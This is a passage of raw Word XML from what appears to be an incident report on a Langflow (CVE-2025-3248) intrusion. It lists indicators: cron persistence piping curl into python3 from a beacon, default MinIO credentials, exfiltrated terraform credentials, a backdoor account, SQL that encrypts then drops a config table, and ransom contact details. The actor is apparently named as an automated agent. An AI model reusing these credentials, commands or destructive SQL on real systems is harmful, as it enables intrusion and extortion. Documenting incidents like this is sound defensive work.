              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14EFB48E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, account: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>langflow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, daily ~19:35 UTC — curl | python3 pull from the beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="62206BC9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39CA6406" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Compromised/default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="246C19A4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MinIO</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minioadmin:minioadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="44DDC274" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10D3FB9A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Exfiltrated object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F6806E8" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>terraform-state/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>credentials.json</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MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="7E13060C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A79C39F" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Backdoor account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C525851" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>svc_maint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (created on ff-nacos-01, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8801, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 997)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="44449D1C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ADBE67B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Destructive SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2125DAB9" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AES_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ENCRYPT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">content, @k) on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">; DROP TABLE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>config_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="007778C4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="174C13F7" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Ransom artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CA6A792" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>README_RANSOM (table/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ibd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="63ABFF97" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="026099D3" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Ransom contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EF9E3FB" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>e78393397@proton.me</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="4F8941C7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5879288F" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>BTC address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B15D496" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1A33103B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FAD4D7A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Agent session ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16822786" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">jp-7f3c9a21 (actor: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>jadepuffer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-agent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="70C4CA0D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34026507" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Run ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AEA7CDB" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>jp-46-20260730</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48885586" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Mapping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E05751" w14:paraId="672FF7BD"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3145D8D0" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F9B62F3" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="22512789" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36400A57" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51D98F09" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application — Langflow /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/v1/validate/code, CVE-2025-3248</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="5F46CDFF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E666F64" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1059.006</w:t>
            </w:r>
